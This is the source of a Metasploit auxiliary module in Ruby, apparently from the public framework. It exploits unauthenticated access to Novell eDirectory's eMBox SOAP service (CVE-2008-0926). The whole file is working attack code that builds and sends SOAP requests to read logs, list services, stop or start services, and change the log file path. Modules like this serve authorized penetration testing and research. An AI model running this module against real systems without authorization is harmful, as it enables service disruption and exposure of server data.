##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',
        'Description' => %q{
          This module will access Novell eDirectory's eMBox service and can run the
          following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
          STOP_SERVICE, START_SERVICE, SET_LOGFILE.
        },
        'References' => [
          [ 'CVE', '2008-0926' ],
          [ 'BID', '28441' ],
          [ 'OSVDB', '43690' ]
        ],
        'Author' => [
          'Nicob',
          'MC', # Initial Metasploit module
          'sinn3r'
        ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        },
        'Actions' => [
          [
            'GET_DN',
            {
              'Description' => 'Get DN',
              'CMD' => 'novell.embox.connmgr.serverinfo',
              'PATTERN' => %r{<ServerDN dt="Binary">(.*)</ServerDN>},
              'USE_PARAM' => false
            }
          ],
          [
            'READ_LOGS',
            {
              'Description' => 'Read all the log files',
              'CMD' => 'logger.readlog',
              'PATTERN' => %r{<LogFileData>(.*)</LogFileData>},
              'USE_PARAM' => false
            }
          ],
          [
            'LIST_SERVICES',
            {
              'Description' => 'List services',
              'CMD' => 'novell.embox.service.getServiceList',
              'PATTERN' => %r{<DSService:Message dt="Binary">(.*)</DSService:Message>},
              'USE_PARAM' => false
            }
          ],
          [
            'STOP_SERVICE',
            {
              'Description' => 'Stop a service',
              'CMD' => 'novell.embox.service.stopService',
              'PATTERN' => %r{<DSService:Message dt="Binary">(.*)</DSService:Message>},
              'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">' \
                               '<DSService:moduleName>__PARAM__</DSService:moduleName>' \
                               '</params></Parameters>',
              'USE_PARAM' => true
            }
          ],
          [
            'START_SERVICE',
            {
              'Description' => 'Start a service',
              'CMD' => 'novell.embox.service.startService',
              'PATTERN' => %r{<DSService:Message dt="Binary">(.*)</DSService:Message>},
              'PARAM' => '<Parameters>' \
                               '<params xmlns:DSService="service.dtd">' \
                               '<DSService:moduleName>__PARAM__</DSService:moduleName>' \
                               '</params></Parameters>',
              'USE_PARAM' => true
            }
          ],
          [
            'SET_LOGFILE',
            {
              'Description' => 'Read Log File',
              'CMD' => 'logger.setloginfo',
              'PATTERN' => %r{<Logger:Message dt="Binary">(.*)</Logger:Message>},
              'PARAM' => '<Parameters><params><logFile>__PARAM__</logFile>' \
                               '<logOptionAppend/></params></Parameters>',
              'USE_PARAM' => true
            }
          ]
        ],
        'DefaultAction' => 'LIST_SERVICES'
      )
    )

    register_options(
      [
        Opt::RPORT(8028),
        OptString.new('PARAM', [false, 'Specify a parameter for the action'])
      ]
    )
  end

  def run
    if action.opts['USE_PARAM']
      if datastore['PARAM'].nil? || datastore['PARAM'].empty?
        print_error("You must supply a parameter for action: #{action.name}")
        return
      else
        param = action.opts['PARAM'].gsub('__PARAM__', datastore['PARAM'])
      end
    else
      param = '<Parameters><params/></Parameters>'
    end

    template = %(<?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Header/>
    <SOAP-ENV:Body>
    <dispatch>
    <Action>#{action.opts['CMD']}</Action>
    <Object/>#{param}</dispatch>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>)

    template = template.gsub(/^ {4}/, '')
    template = template.gsub("\n", '')

    connect
    print_status("Sending command: #{action.name}...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => '/SOAP',
      'data' => template + "\n\n",
      'headers' =>
        {
          'Content-Type' => 'text/xml',
          'SOAPAction' => '"' + Rex::Text.rand_text_alpha_upper(rand(1..25)) + '"'
        }
    }, 25)

    if res.nil?
      print_error('Did not get a response from server')
      return
    end

    raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]
    print_line("\n" + Rex::Text.decode_base64(raw_data))

    disconnect
  end
end